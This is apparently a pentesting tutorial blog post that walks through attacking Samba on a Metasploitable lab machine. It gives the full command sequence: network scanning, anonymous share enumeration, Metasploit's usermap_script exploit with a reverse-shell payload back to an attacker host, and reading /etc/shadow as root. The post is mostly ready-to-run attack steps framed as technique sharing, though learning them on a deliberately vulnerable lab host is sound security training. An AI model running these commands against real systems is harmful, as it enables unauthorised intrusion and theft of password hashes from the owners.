Every week we try to share techniques and tools to attack the most common services used by companies all around the World, such as Apache, MySQL, PostgreSQL, etc. In this episode, Gianni turns his attention to Samba. After a short introduction to learn how to find all the computers that have open shares, he moves on and shows how to get the Netbios name of an host, get the list of shares available on the host, download files from a share, and exploit vulnerable Samba instances.

Tools, Scripts, and Exploits

Steps

  • Identify all the computers that have open shares
    • nmap -v -sV 192.168.75.0/24 -p 139
  • Get the Netbios name of the target machine
    • nmblookup -A 192.168.75.149
  • Get the list of shares available on the target machine
    • smbclient -L \\METASPLOITABLE -I 192.168.75.149 -N
  • Inspect the tmp share
    • smbclient //METASPLOITABLE/tmp -I 192.168.75.149 -N
    • dir
    • cd .ICE-unix
    • dir
    • cd ..
    • cd .X11-unix
    • dir
    • exit
  • Use the Metasploit’s usermap_script module to get code execution
    • msfconsole
    • use exploit/multi/samba/usermap_script
    • show options
    • set RHOST 192.168.75.149
    • show payloads
    • set PAYLOAD cmd/unix/reverse
    • show options
    • /sbin/ifconfig
    • set LHOST 192.168.75.146
    • exploit
  • Get root
    • whoami
    • cat /etc/shadow
  • Game over!

Leave a Reply

Your email address will not be published. Required fields are marked *